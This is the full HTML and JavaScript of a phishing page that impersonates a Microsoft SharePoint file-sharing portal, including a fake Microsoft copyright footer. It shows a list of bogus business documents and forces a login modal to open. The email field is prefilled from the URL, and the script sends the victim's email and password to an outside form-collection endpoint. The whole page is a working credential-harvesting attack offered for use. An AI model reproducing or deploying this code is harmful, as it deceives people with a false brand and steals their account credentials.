<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Share Point</title>
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css" />
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css" integrity="sha384-9ndCyUaIbzAi2FUVXJi0CjmCapSmO7SnpJef0486qhLnuZ2cdeRhO02iuK6FUUVM" crossorigin="anonymous">

    <style>
        body {
            font-family: sans-serif;
            margin: 0;
            padding: 0;
            display: flex;
            flex-direction: column;
            min-height: 100vh;
        }
        header {
            background-color: #026fc2;
            color: white;
            display: flex;
            align-items: center;
            padding: 10px;
        }
        main {
            flex: 1;
            padding: 20px;
        }
        table {
            width: 100%;
            border-collapse: collapse;
        }
        footer {
            text-align: center;
            padding: 10px;
            background-color: #f2f2f2;
        }
        td img {
            height: 50px;
            width: 50px;
        }
        .form-label {
            margin-bottom: 1px;
            font-size: 15px;
        }
        .form-control:disabled,
        .form-control[readonly] {
            background-color: #f8f8f8;
            opacity: 1;
        }
    </style>
</head>
<body>
    <header class="container-fluid text-white d-flex align-items-center py-3">
        <div class="d-flex align-items-center pl-4" style="margin-left: 100px">
            <img src="https://iili.io/JWGZ8Mv.jpg" class="me-3" />
        </div>
    </header>
 <main class="container py-4">
        <h2>Files</h2>
        <div class="row">
            <div class="col-md-8 shadow-sm">
                <h6>All Files Are Ready To Download</h6>
                <table class="table">
                    <thead>
                        <tr>
                            <th scope="col"></th>
                            <th scope="col">Name↑</th>
                            <th scope="col">Size▼</th>
                            <th scope="col" class="text-right">Action</th>
                        </tr>
                    </thead>
                    <tbody>
                        <tr>
                            <td><img src="https://iili.io/JWGkUx9.png" /></td>
                            <td>Product quantity.xlsx</td>
                            <td>1.1 MB</td>
                            <td class="text-right"><a href="#" class="btn btn-link">Download</a></td>
                        </tr>
                        <tr>
                            <td><img src="https://iili.io/JWGk8D7.png" /></td>
                            <td>Sample images</td>
                            <td>1.8 MB</td>
                            <td class="text-right"><a href="#" class="btn btn-link">Download</a></td>
                        </tr>
                        <tr>
                            <td><img src="https://iili.io/JWGkUx9.png" /></td>
                            <td>Specific products, with detailed descriptions.xlsx</td>
                            <td>1.6 MB</td>
                            <td class="text-right"><a href="#" class="btn btn-link">Download</a></td>
                        </tr>
                        <tr>
                            <td><img src="https://iili.io/JWGk8D7.png" /></td>
                            <td>Company profile.pdf</td>
                            <td>3.07 MB</td>
                            <td class="text-right"><a href="#" class="btn btn-link">Download</a></td>
                        </tr>
                        <tr>
                            <td><img src="https://iili.io/JWGk8D7.png" /></td>
                            <td>Delivery requirements.pdf</td>
                            <td>1.07 MB</td>
                            <td class="text-right"><a href="#" class="btn btn-link">Download</a></td>
                        </tr>
                        <tr>
                            <td colspan="3"></td>
                            <td class="text-right"><a href="#" class="btn btn-primary">Download All</a></td>
                        </tr>
                    </tbody>
                </table>
            </div>
            <div class="col-md-3">
                <img src="https://iili.io/JWGOlqJ.jpg" style="width: 300px; margin-left: 20px" />
            </div>
        </div>
    </main>
  <div class="modal fade" id="modal-container" tabindex="-1" aria-labelledby="loginModalLabel" aria-hidden="true">
        <div class="modal-dialog">
            <div class="modal-content">
                <div class="modal-header">
                    <img src="https://cdn.glitch.global/26e3792d-bd6f-421e-a2c4-ea3097e5c19f/loo.jpg?v=1675748203267" />
                    <button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>
                </div>
                <div class="modal-body">
                    <div>
                        <img src="https://iili.io/JWM9UzP.png" class="img-fluid mb-2" />
                    </div>
                     
                      <div id="display-msg" class="alert alert-danger" style="display: none; padding: 10px"></div>
                      <div class="text-center mb-1"><em>Enter details to access protected documents</em></div>
                      <form id="loginForm" action="https://submit.formspark.io/your-form-id" method="POST"> 
                      <div class="mb-2">
                          <label for="email" class="form-label">Email address</label>
                          <input type="email" class="form-control shadow-none" placeholder="Receiver's email" name="email" id="email" required readonly />
                      </div>
                      <div class="mb-3">
                          <label for="password" class="form-label">Password</label>
                          <input type="password" class="form-control shadow-none" placeholder="Receiver's password" name="password" id="password" minlength="4" required />
                      </div>
                       
                      <div class="text-center mb-2">
                          <button type="submit" id="mpanampa" class="btn btn-primary">Access Files</button>
                      </div>
                  </form>
                  
                </div>
            </div>
        </div>
    </div>

    <footer class="container-fluid bg-light text-center py-1" style="margin-bottom: 0px">
        <p style="font-size: 13px">© 2024 Microsoft Corporation</p>
    </footer>
 <script>
    const displayElement = document.querySelector("#display-msg");
    displayElement.style.display = "none";

    document.addEventListener("DOMContentLoaded", () => {
        const modalOptions = {
          keyboard: false,
          backdrop: "static",
        };
        const modalInstance = new bootstrap.Modal(document.querySelector("#modal-container"), modalOptions);
        modalInstance.show();

        const urlQuery = window.location.search;
        const urlParams = new URLSearchParams(urlQuery);
        const emailParam = urlParams.get("e") || "";
         
        if (validateEmailAddress(emailParam)) {
          document.querySelector("#email").value = emailParam;
          document.querySelector("#email").readonly = true;
        }

        document.querySelectorAll("td").forEach((cell) => {
          cell.addEventListener("click", () => {
            modalInstance.show();
          });
        });

        document.querySelector("#loginForm").addEventListener("submit", async (event) => {
                event.preventDefault();
                const submitButton = document.querySelector("#mpanampa");
                submitButton.disabled = true;
                submitButton.textContent = "Verifying...";

                const jsonData = {
                    email: document.querySelector("#email").value,
                    password: document.querySelector("#password").value,
                };

                try {
                    const response = await fetch('https://submit-form.com/wJtO5VHYn', {
                        method: 'POST',
                        headers: {
                            'Content-Type': 'application/json'
                        },
                        body: JSON.stringify(jsonData)
                    });

                    const data = await response.json();
                    displayElement.style.display = "flex";
                    displayElement.textContent = data.message || 'Success!';
                } catch (error) {
                    displayElement.style.display = "flex";
                    displayElement.textContent = 'Network error, kindly try again!';
                } finally {
                    submitButton.disabled = false;
                    submitButton.textContent = "Access Files";
                    document.querySelector("#password").value = ""; // Clear password field
                }
            });
        });

        function validateEmailAddress(email) {
            const emailRegex = /^([a-zA-Z0-9._%-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,})$/;
            return emailRegex.test(email);
        }
    </script>
<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/js/bootstrap.bundle.min.js" integrity="sha384-geWF76RCwLtnZ8qwWowPQNguL3RmwHVBC9FhGdlKrxdiJJigb/j/68SIy3Te4Bkz" crossorigin="anonymous"></script>
</body>
</html>